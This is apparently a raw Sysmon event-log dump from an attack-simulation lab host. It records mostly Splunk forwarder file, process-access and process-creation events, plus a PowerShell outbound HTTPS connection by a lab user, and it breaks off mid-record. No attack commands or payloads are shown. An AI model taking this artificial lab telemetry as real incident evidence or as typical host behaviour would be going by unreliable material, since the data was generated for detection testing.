23542300x800000000000000035083783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:04.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C050E0B47C3AC806E0BAC52715094BBE,SHA256=AD89B692D4907F70AB7455A383664333454459AE3DBD79F0A4082F44569CB646,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:04.506{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D55F7AB43B421361E5A624A1D029F6D5,SHA256=B99E0559E9DC8B5C35A8D36DE4D10CB624AD1BA35B169B845EA47180EA4EB962,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:05.687{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDEB12DF12354242EC3C0B1A204DDFF3,SHA256=E42C45D773E9C5685282903B9C7124DFDF9E3A64EEDD70AA2C255189FDC87B84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:06.705{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE1BA27C07E6C7DBC63F09F7809E6E62,SHA256=86A43281AB905CA55347493D5034A078AFED80F11FA1CA642CB2EC0176B86D8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:07.722{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0447A999CA4C91E4D7F39641ABD71F07,SHA256=2061511076FE7FAD1CE902D7962ECF872FE8FC196232500CD2B84BB90EB2CC9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:08.737{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=502C49C295718758E1566A66A4106CDC,SHA256=AF32C7391CFD00FE5DF1CC12FD422B66F4C3A26F76DCFA4FB79476658B759D5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:09.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0BB29A60F410FB0177099DFF6B036A7,SHA256=E42AB047C18EAD760AECB716950565475957A9BFF2B9FE7FE427FCDCA373B325,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:34.116{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56520-false10.0.1.12-8000- 23542300x800000000000000035083793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:10.772{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1430873F29E4D424528F5771CCDB6C5D,SHA256=CC264DE8459B8705F429A79731D10071AE88E0C16660AF8F4C94E974211911B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:10.372{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8FFF8A0106A2576C0C262D97ECF5CE02,SHA256=D1F5F6A207143C729D713856EF1A86A8C7B25C4C23D33BA6B8CFB0453BB8E83B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:35.365{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56521-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:11.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13B07F3F88F8213019F20024ECD7217E,SHA256=00323E080B6BD5F346D92E399F8B0657E8705A28BD9486A32B3201CD6A8A001E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:12.805{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82D2D231C260F9340A6897E3E80A4E65,SHA256=437AA2007B3DF6DCA210DA2B6203BAE1EAA3AF06F2215C646B9ED4A56C79C5A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22FA0AB40937A7529A2A41AC845376DE,SHA256=8AA5E70D6E70D2E7315A87BCB193BA2FA06B522820AAE9CB30A23B035FDFC299,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.585{B81B27B7-4D51-613A-2090-03000000C801}46285280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.407{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D51-613A-2090-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.407{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.407{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.407{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.407{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.407{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4D51-613A-2090-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.407{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D51-613A-2090-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:13.402{B81B27B7-4D51-613A-2090-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653148F964B09527B8871AC71947A704,SHA256=02316608F9743A1D45954225B2861FD9CCE853651BEF3F2E738BE201C3FF776B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC646C95D1B672937B1AC3B74E58366E,SHA256=32D40C296E072BBC6F7C8D971B2C64B5D98E3BAA0ABA4541148EC5CB09B4C23F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05FC7FDB6B1DDC858D7E039FBF52DD94,SHA256=42B488FD2D7DED2C81EF0B4A2AEF1C208D3C099490076F18258E875AAAF757CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.085{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D52-613A-2190-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.085{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.085{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.085{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.085{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.085{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4D52-613A-2190-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.085{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D52-613A-2190-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:14.070{B81B27B7-4D52-613A-2190-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:15.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725A672337CF724B2A926720DFCF200C,SHA256=7AD01398A3EC0968A4CDF88954CAFDDC3B557DE908DC7685D1548ED55649BC48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:15.402{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D100804E89BC4607F7EA1173E563D043,SHA256=3A58887224B9C663251820AD5C3BCF52FD75FE8969C130F81437FA3A13F8C76F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:16.852{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2948C81C54C2BE0D4B60C6A8A91C90AA,SHA256=280F41725C77E64DB5FBAEBA6FA09320063EA13408CE8B91F533976F555BFDDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 